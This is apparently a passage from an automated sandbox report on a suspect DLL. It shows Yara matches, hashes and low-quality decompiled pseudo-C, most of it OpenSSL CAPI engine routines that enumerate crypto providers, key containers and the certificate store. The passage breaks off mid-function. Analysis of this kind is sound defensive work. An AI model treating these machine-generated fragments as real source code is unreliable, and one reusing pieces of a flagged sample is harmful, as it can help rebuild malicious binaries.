                                        • Instruction Fuzzy Hash: 235104B22457C08AFB10CF24E548BA9BBA2F744B98F48E212CB6847FD4DB38C651C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E000001C31C3386E9060() {
                                        				void* _t3;
                                        				long _t7;
                                        				void* _t20;
                                        				signed int _t21;
                                        
                                        				_t3 = E000001C31C33871DF60(_t21); // executed
                                        				if (_t3 != 0) goto 0x386e90ac;
                                        				r8d = E000001C31C338811C60(_t20);
                                        				r8d = r8d - ((r8d - (0x86186187 * r8d >> 0x20) >> 1) + (0x86186187 * r8d >> 0x20) >> 4) * 0x15;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??); // executed
                                        				_t7 = SleepEx(??, ??); // executed
                                        				if (_t7 == 0) goto 0x386e9070;
                                        				ExitProcess(??);
                                        			}








                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 2e1ae2b01005a82f3f8fd86224fac0ac553dab149eacfd59a0452e5db93d66d2
                                        • Instruction ID: 74d74bb59281d762d3efa50701611a69bd6bc1d2fcb3ef7e39c14cfcdbbb3571
                                        • Opcode Fuzzy Hash: 2e1ae2b01005a82f3f8fd86224fac0ac553dab149eacfd59a0452e5db93d66d2
                                        • Instruction Fuzzy Hash: 3F01AF32241BC099F7749F21AC44BDA37E8FB40728F10560A9EB44AEE9CF38C390D601
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E000001C31C3386E59D0(void* __rax) {
                                        				void* _v424;
                                        				void* _t9;
                                        
                                        				E000001C31C33880BA74(_t9, __rax);
                                        				asm("lock xadd [0x225c40], eax");
                                        				if (1 != 1) goto 0x386e5a0b;
                                        				__imp__#115(); // executed
                                        				 *0x3890b634 = 2;
                                        				return  *0x3890b634;
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup_onexit
                                        • String ID:
                                        • API String ID: 3012808385-0
                                        • Opcode ID: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction ID: 51d0dd06684aae3bd4f7891461e261fbd377ae325978380a7bef3687297e34a1
                                        • Opcode Fuzzy Hash: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction Fuzzy Hash: 35E08C32AD21D486FB10EB14E980BD82360F794718FC0A023D125C61A0DF1CC74ACB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmp
                                        • String ID:
                                        • API String ID: 1534048567-0
                                        • Opcode ID: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction ID: 8dbc114bb50e99e9ac0997ad7680c9a2789de39204833da6b6addadb69a35f9f
                                        • Opcode Fuzzy Hash: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction Fuzzy Hash: C74108323455A487FA24CF85E849BBD77A2F780784F14E432DF9A47E44E774EA918702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C338822114(void* __eax, signed int __rcx, signed int __rdx) {
                                        				void* __rbx;
                                        				intOrPtr* _t22;
                                        				signed int _t29;
                                        
                                        				_t29 = __rdx;
                                        				if (__rcx == 0) goto 0x38822133;
                                        				_t1 = _t29 - 0x20; // -32
                                        				_t22 = _t1;
                                        				if (_t22 - __rdx < 0) goto 0x38822176;
                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                        				goto 0x3882215a;
                                        				if (E000001C31C338830330() == 0) goto 0x38822176;
                                        				if (E000001C31C338825368(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x38822176;
                                        				HeapAlloc(??, ??, ??); // executed
                                        				if (_t22 == 0) goto 0x38822145;
                                        				goto 0x38822183;
                                        				E000001C31C338818984(_t22);
                                        				 *_t22 = 0xc;
                                        				return 0;
                                        			}







                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction ID: 992b5b24b675596130631ac16a8dea862a4f4be6de2ba680c2dfe88f3b468105
                                        • Opcode Fuzzy Hash: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction Fuzzy Hash: 6FF062743812C951FE549671D951FD582913B98780F0CF4264E29CE3D1EF6CD7908112
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C3386EAE60(void* __edx, long long __rax, void* __rcx, char _a16) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				void* _t25;
                                        				long long _t31;
                                        				void* _t32;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t35;
                                        				void* _t37;
                                        
                                        				_t33 = __rcx;
                                        				_a16 = 0;
                                        				if (__edx != 1) goto 0x386eaf05;
                                        				asm("o16 nop [eax+eax]");
                                        				 *0x3890b29c = 1;
                                        				if ( *0x3890b29c == 1) goto 0x386eae80;
                                        				if ( *0x3890b508 == 0) goto 0x386eaea4;
                                        				 *0x3890b29c = 0;
                                        				goto 0x386eaed4;
                                        				r8d = 0x3000;
                                        				_t4 = _t33 + 4; // 0x4, executed
                                        				r9d = _t4;
                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                        				 *0x3890b514 = 0xa;
                                        				 *0x3890b508 = __rax;
                                        				 *0x3890b29c = 0;
                                        				E000001C31C33871B69C(_t25, __rax, _t32, _t34, _t37); // executed
                                        				_t31 =  &_a16;
                                        				r9d = 0;
                                        				_v16 = _t31;
                                        				_v24 = 0;
                                        				E000001C31C338811DF0(0, 0, _t31, _t32, _t33, _t35, 0x1c3386e90c0, _t37); // executed
                                        				 *0x3890b4a8 = _t31;
                                        				return 1;
                                        			}













                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction ID: 28cd0d375bd5f4469fa48bd822ffa50875b61a8b07a51d738087ec9d90e19139
                                        • Opcode Fuzzy Hash: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction Fuzzy Hash: D4118CB06816C08AF7258B24E905BC937E0FB59308FA0E02BC669876B0DB3DC340CF42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E000001C31C33872FCB0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r12) {
                                        				void* __rbp;
                                        				int _t50;
                                        				signed int _t74;
                                        				int _t101;
                                        				signed long long _t134;
                                        				signed long long _t135;
                                        				int _t139;
                                        				char* _t158;
                                        				void* _t169;
                                        				signed long long _t171;
                                        				void* _t172;
                                        				void* _t173;
                                        				void* _t174;
                                        
                                        				E000001C31C33880C220();
                                        				_t173 = _t172 - __rax;
                                        				_t171 = _t173 + 0x30;
                                        				 *((long long*)(_t171 + 0x40)) = __rbx;
                                        				 *((long long*)(_t171 + 0x48)) = __rsi;
                                        				 *((long long*)(_t171 + 0x50)) = __rdi;
                                        				 *((long long*)(_t171 + 0x58)) = __r12;
                                        				_t134 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t135 = _t134 ^ _t171;
                                        				 *(_t171 + 0x10) = _t135;
                                        				r9d =  *(__rcx + 0x20);
                                        				_t158 = "Listing containers CSP=%s, type = %d\n";
                                        				_t169 = __rcx;
                                        				 *_t171 = 0;
                                        				r15d = 1;
                                        				E000001C31C33872D790(_t135, _t158,  *((intOrPtr*)(__rcx + 0x18)), __r9);
                                        				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0x3872fdc8;
                                        				 *((intOrPtr*)(_t173 + 0x28)) = 0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *((long long*)(_t173 + 0x20)) = __rbx;
                                        				_t50 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				_t101 = _t50;
                                        				 *(_t171 + 4) = _t101;
                                        				if (_t50 == 0) goto 0x3872fd88;
                                        				_t13 = _t135 + _t135 + 0xf; // 0xf
                                        				if (_t13 - _t135 + _t135 > 0) goto 0x3872fd54;
                                        				E000001C31C33880C220();
                                        				_t174 = _t173 - 0xffffffffffffff0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *(_t174 + 0x28) = _t101;
                                        				_t139 = _t174 + 0x30;
                                        				 *(_t174 + 0x20) = _t139;
                                        				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t139 != 0) goto 0x3872fdc8;
                                        				if ( *0x38909020 != 0) goto 0x3872fd9d;
                                        				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4ad;
                                        				_t19 = _t158 - 0x2a; // 0x41
                                        				r8d = _t19;
                                        				E000001C31C3387222D0(_t54, 0x6b,  *0x38909020, 0xfffffff0, _t139, 0xffffffffffffff0, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
                                        				goto 0x38730007;
                                        				r9d =  *(_t169 + 0x20);
                                        				 *(_t174 + 0x20) = 0xf0000000;
                                        				__imp__CryptAcquireContextW();
                                        				if (0 != 0) goto 0x3872fe27;
                                        				if ( *0x38909020 != 0) goto 0x3872fdfc;
                                        				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4b5;
                                        				_t24 = _t158 - 4; // 0x67
                                        				r8d = _t24;
                                        				E000001C31C3387222D0(_t59, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t171 + 8, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
                                        				goto 0x38730007;
                                        				r8d = 0;
                                        				 *(_t174 + 0x20) = r15d;
                                        				__imp__CryptGetProvParam();
                                        				if (0 != 0) goto 0x3872fe90;
                                        				if ( *0x38909020 != 0) goto 0x3872fe5a;
                                        				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4bb;
                                        				r8d = 0x6b;
                                        				E000001C31C3387222D0(_t64, 0x6b,  *0x38909020, 0xfffffff0, _t139,  *((intOrPtr*)(_t171 + 8)), _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
                                        				__imp__CryptReleaseContext();
                                        				goto 0x38730007;
                                        				r8d =  *_t171;
                                        				E000001C31C33872D790(0xfffffff0, "Got max container len %d\n", _t139, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				_t160 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				r8d = 0x4c3;
                                        				_t70 =  ==  ? 0x400 :  *_t171;
                                        				 *_t171 =  ==  ? 0x400 :  *_t171;
                                        				E000001C31C338725700();
                                        				if (0xfffffff0 != 0) goto 0x3872ff08;
                                        				if ( *0x38909020 != 0) goto 0x3872fee4;
                                        				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4c5;
                                        				_t31 = _t160 - 0x2a; // 0x41
                                        				r8d = _t31;
                                        				E000001C31C3387222D0(_t72, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t169, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x3872ffe0;
                                        				asm("o16 nop [eax+eax]");
                                        				_t74 =  *_t171;
                                        				r14d = 0;
                                        				 *(_t171 + 4) = _t74;
                                        				 *0xfffffff0 = 0;
                                        				r14b = 0 == 0;
                                        				 *(_t174 + 0x20) = r14d;
                                        				__imp__CryptGetProvParam();
                                        				if (_t74 == 0) goto 0x3872ff97;
                                        				r9d =  *(_t171 + 4);
                                        				 *(_t174 + 0x28) = r14d;
                                        				 *(_t174 + 0x20) = 0;
                                        				E000001C31C33872D790(0xfffffff0, "Container name %s, len=%d, index=%d, flags=%d\n", 0xfffffff0, _t171 + 4);
                                        				if ( *0xfffffff0 != 0) goto 0x3872ff6d;
                                        				if ( *(_t171 + 4) ==  *_t171) goto 0x3872ff86;
                                        				r8d = 0;
                                        				E000001C31C3387263F0(0xfffffff0, "%lu. %s\n", 0xfffffff0, 0xfffffff0);
                                        				goto 0x3872ff10;
                                        				E000001C31C33872D790(0xfffffff0, "Enumerate bug: using workaround\n", 0xfffffff0, 0xfffffff0);
                                        				goto 0x3872ffe3;
                                        				if (GetLastError() == 0x103) goto 0x3872ffe3;
                                        				if ( *0x38909020 != 0) goto 0x3872ffbb;
                                        				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4d6;
                                        				r8d = 0x6b;
                                        				E000001C31C3387222D0(_t81, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t169, "Enumerate bug: using workaround\n", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872D9B0(_t79,  *0x38909020, 0xfffffff0, "Enumerate bug: using workaround\n");
                                        				r15d = 0;
                                        				r8d = 0x4e7;
                                        				E000001C31C338725750();
                                        				__imp__CryptReleaseContext();
                                        				E000001C31C33880C290();
                                        				return r15d;
                                        			}

















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$ByteCharMultiParamProvReleaseWide$AcquireErrorLast
                                        • String ID: %lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
                                        • API String ID: 1510837364-3467115363
                                        • Opcode ID: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction ID: 6d372008419d489b4bb26bd6517de8cf4ff141faea5caac631ddabda196fd43b
                                        • Opcode Fuzzy Hash: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction Fuzzy Hash: 7DA15E722406C09AF720DF75D844FDA37A2F748798F50E217EA2A8BA95DB38C745C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E000001C31C338730030(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long _a8, long _a16, char _a20, char _a24, signed long long _a40, long long _a48, long long _a112) {
                                        				long _v0;
                                        				void* __rbp;
                                        				void* _t28;
                                        				long _t32;
                                        				long _t40;
                                        				void* _t64;
                                        				signed long long _t79;
                                        				long _t81;
                                        				long _t82;
                                        				char* _t107;
                                        				void* _t113;
                                        				long _t128;
                                        
                                        				_t120 = __r9;
                                        				_t116 = __r8;
                                        				E000001C31C33880C220();
                                        				_t79 =  *0x38903000; // 0x9bfaf736ae76
                                        				_a40 = _t79 ^ _t113 - __rax;
                                        				_t112 = __rcx;
                                        				E000001C31C33872D790(_t79 ^ _t113 - __rax, "capi_list_providers\n", __r8, __r9);
                                        				E000001C31C3387263F0(_t79 ^ _t113 - __rax, "Available CSPs:\n", _t116, _t120);
                                        				r15d = 0;
                                        				_a112 = __rbx;
                                        				_t64 = r15d;
                                        				_a48 = __rsi;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = _t64;
                                        				_t28 = E000001C31C33872D790(_t79 ^ _t113 - __rax, "capi_get_provname, index=%d\n", _t116, _t120);
                                        				_t81 =  &_a20;
                                        				r8d = 0;
                                        				_a8 = _t81;
                                        				_v0 = _t128;
                                        				__imp__CryptEnumProvidersW();
                                        				if (_t28 == 0) goto 0x38730229;
                                        				r8d = 0x46c;
                                        				E000001C31C338725700();
                                        				_t84 = _t81;
                                        				if (_t81 == 0) goto 0x387301f3;
                                        				_t82 =  &_a20;
                                        				r8d = 0;
                                        				_a8 = _t82;
                                        				_v0 = _t81;
                                        				__imp__CryptEnumProvidersW();
                                        				if (_t28 == 0) goto 0x3873018b;
                                        				E000001C31C338730FB0(_t82, _t81);
                                        				r8d = 0x47c;
                                        				_t110 = _t82;
                                        				E000001C31C338725750();
                                        				if (_t82 == 0) goto 0x3873029a;
                                        				r9d = _a16;
                                        				E000001C31C33872D790(_t82, "capi_get_provname, returned name=%s, type=%d\n", _t82,  &_a16);
                                        				_v0 = _a16;
                                        				r8d = _t64;
                                        				E000001C31C3387263F0(_t82, "%lu. %s, type %lu\n", _t82, _t82);
                                        				r8d = 0x496;
                                        				E000001C31C338725750();
                                        				goto 0x38730090;
                                        				_t32 = GetLastError();
                                        				r8d = 0x473;
                                        				_t107 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				E000001C31C338725750();
                                        				if (_t32 == 0x103) goto 0x3873029a;
                                        				if ( *0x38909020 != 0) goto 0x387301c9;
                                        				 *0x38909020 = E000001C31C338721CE0(_t82);
                                        				_v0 = 0x476;
                                        				r8d = 0x68;
                                        				E000001C31C3387222D0(_t34, 0x68,  *0x38909020, _t82, _t81, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872D9B0(_t32,  *0x38909020, _t82, _t107);
                                        				goto 0x3873029a;
                                        				if ( *0x38909020 != 0) goto 0x38730208;
                                        				 *0x38909020 = E000001C31C338721CE0(_t82);
                                        				_v0 = 0x46e;
                                        				_t18 = _t107 - 0x27; // 0x41
                                        				r8d = _t18;
                                        				E000001C31C3387222D0(_t38, 0x68,  *0x38909020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x3873029a;
                                        				_t40 = GetLastError();
                                        				if (_t40 == 0x103) goto 0x3873029a;
                                        				if ( *0x38909020 != 0) goto 0x3873024d;
                                        				 *0x38909020 = E000001C31C338721CE0(_t82);
                                        				_v0 = 0x468;
                                        				r8d = 0x68;
                                        				E000001C31C3387222D0(_t42, 0x68,  *0x38909020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				r9d = _t40;
                                        				E000001C31C338726420(_t82,  &_a24, _t107, "%lX", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C338721640(2, _t82, "Error code= 0x",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}
















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                        • API String ID: 747760079-1615478548
                                        • Opcode ID: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction ID: cdb4e66b3253af64b1549eccb944c197d1ecb8158ee12765436c29bea4c6378c
                                        • Opcode Fuzzy Hash: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction Fuzzy Hash: 62619E723906C082F750DB61E844FDA27A2F788B80F44E127AD694B796DF7CC7858B42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease$CountCounterCurrentGlobalMemoryPerformanceProcessQueryStatusTick
                                        • String ID: @$Intel Hardware Cryptographic Service Provider
                                        • API String ID: 246993173-3158535399
                                        • Opcode ID: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction ID: 71cd0efb329f6032408f63f31fefb06029ed7b4e2168b7d45345949d6a23b221
                                        • Opcode Fuzzy Hash: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction Fuzzy Hash: F141A032255AC082FB51DF21E848BDA6362FBD4740F50E123EDAA8B5A5DF3DC645CB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E000001C31C338730380(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long* _a112) {
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* _t9;
                                        				intOrPtr _t10;
                                        				void* _t15;
                                        				intOrPtr _t17;
                                        				long long _t24;
                                        				void* _t25;
                                        
                                        				_t15 = __rax;
                                        				_a32 = __r9;
                                        				_a24 = __r8;
                                        				_a16 = __rdx;
                                        				_a8 = __rcx;
                                        				E000001C31C33880C220();
                                        				_t10 =  *0x388e78c4; // 0xffffffff
                                        				E000001C31C3387311E0(__rax, __rcx);
                                        				 *((long long*)(__r9)) = _t24;
                                        				 *_a112 = _t24;
                                        				_t17 =  *((intOrPtr*)(_t15 + 0x30));
                                        				_t23 =  !=  ? _t17 : "MY";
                                        				_t9 = E000001C31C338730650(_t10, _t17, __r9, _t15,  !=  ? _t17 : "MY", _t24, _t25, __r9);
                                        				if (_t17 != 0) goto 0x38730400;
                                        				return _t9;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertStore$CertificatesEnum$CloseOpen
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d
                                        • API String ID: 3767857896-627055899
                                        • Opcode ID: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction ID: 8ca775dd87ee44a6086439f58ec87aec87aacbf7fdf509d66de3b01e855a823f
                                        • Opcode Fuzzy Hash: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction Fuzzy Hash: 7C7198323817C486FA54EB16A854FEA6396BB85FC0F44E422DDAD4B756EF38C6418343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E000001C31C33872E300(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a32, void* _a88) {
                                        				signed long long _v32;
                                        				char _v52;
                                        				signed char _v53;
                                        				signed char _v54;
                                        				signed char _v55;
                                        				signed char _v56;
                                        				signed char _v57;
                                        				signed char _v58;
                                        				signed char _v59;
                                        				signed char _v60;
                                        				signed char _v61;
                                        				signed char _v62;
                                        				signed int _v63;
                                        				signed int _v64;
                                        				signed int _v65;
                                        				signed int _v66;
                                        				signed int _v67;
                                        				signed int _v68;
                                        				signed int _v69;
                                        				signed int _v70;
                                        				signed int _v71;
                                        				signed int _v72;
                                        				char _v80;
                                        				char _v88;
                                        				void* __rbp;
                                        				void* _t95;
                                        				void* _t117;
                                        				void* _t118;
                                        				void* _t147;
                                        				void* _t149;
                                        				signed long long _t167;
                                        				signed long long _t168;
                                        				long long _t171;
                                        				void* _t174;
                                        				char* _t195;
                                        				void* _t203;
                                        
                                        				_t199 = __rsi;
                                        				_t149 = __eflags;
                                        				_a16 = __rbx;
                                        				_a32 = __rsi;
                                        				_t202 = _t203;
                                        				E000001C31C33880C220();
                                        				_t167 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t168 = _t167 ^ _t203 - __rax;
                                        				_v32 = _t168;
                                        				_t174 = __r8;
                                        				_t147 = __edx;
                                        				E000001C31C338740300(0x70, __r8);
                                        				E000001C31C3387311E0(_t168, _t168);
                                        				_t195 = "Called CAPI_dsa_do_sign()\n";
                                        				E000001C31C33872D790(_t168, _t195, __r8, __r9);
                                        				E000001C31C338740340(_t149, _t168, _t174, _t174, __rsi, _t203);
                                        				_t175 = _t168;
                                        				if (_t168 != 0) goto 0x3872e3ac;
                                        				if ( *0x38909020 != 0) goto 0x3872e386;
                                        				 *0x38909020 = E000001C31C338721CE0(_t168);
                                        				_a8 = 0x3e3;
                                        				_t5 = _t195 - 0xd; // 0x65
                                        				r8d = _t5;
                                        				E000001C31C3387222D0(_t80, 0x72,  *0x38909020, _t168, _t168, _t174, _t195, __rsi, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x3872e634;
                                        				if (_t147 == 0x14) goto 0x3872e3ec;
                                        				if ( *0x38909020 != 0) goto 0x3872e3c6;
                                        				 *0x38909020 = E000001C31C338721CE0(_t168);
                                        				_a8 = 0x3e8;
                                        				_t7 = _t195 + 0xa; // 0x7c
                                        				r8d = _t7;
                                        				E000001C31C3387222D0(_t84, 0x72,  *0x38909020, _t168, _t168, _t174, _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x3872e634;
                                        				_t169 =  &_v80;
                                        				r9d = 0;
                                        				_a8 =  &_v80;
                                        				r8d = 0;
                                        				__imp__CryptCreateHash();
                                        				if (0 != 0) goto 0x3872e44e;
                                        				if ( *0x38909020 != 0) goto 0x3872e423;
                                        				 *0x38909020 = E000001C31C338721CE0( &_v80);
                                        				_a8 = 0x3ee;
                                        				_t12 = _t195 - 0xf; // 0x63
                                        				r8d = _t12;
                                        				E000001C31C3387222D0(_t88, 0x72,  *0x38909020,  &_v80, _t168,  *((intOrPtr*)(_t175 + 8)), _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020,  &_v80, _t195);
                                        				goto 0x3872e634;
                                        				r9d = 0;
                                        				__imp__CryptSetHashParam();
                                        				if (0 != 0) goto 0x3872e4a4;
                                        				if ( *0x38909020 != 0) goto 0x3872e47b;
                                        				 *0x38909020 = E000001C31C338721CE0(_t169);
                                        				_a8 = 0x3f5;
                                        				_t16 = _t195 - 0xc; // 0x66
                                        				r8d = _t16;
                                        				E000001C31C3387222D0(_t93, 0x72,  *0x38909020, _t169, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				_t95 = E000001C31C33872DA10( *0x38909020, _t169, _t195);
                                        				goto 0x3872e619;
                                        				_a16 =  &_v88;
                                        				r9d = 0;
                                        				_t171 =  &_v72;
                                        				_v88 = 0x28;
                                        				r8d = 0;
                                        				_a8 = _t171;
                                        				__imp__CryptSignHashW();
                                        				if (_t95 != 0) goto 0x3872e512;
                                        				_t159 =  *0x38909020;
                                        				if ( *0x38909020 != 0) goto 0x3872e4e9;
                                        				 *0x38909020 = E000001C31C338721CE0(_t171);
                                        				_a8 = 0x3fd;
                                        				_t25 = _t195 - 3; // 0x6f
                                        				r8d = _t25;
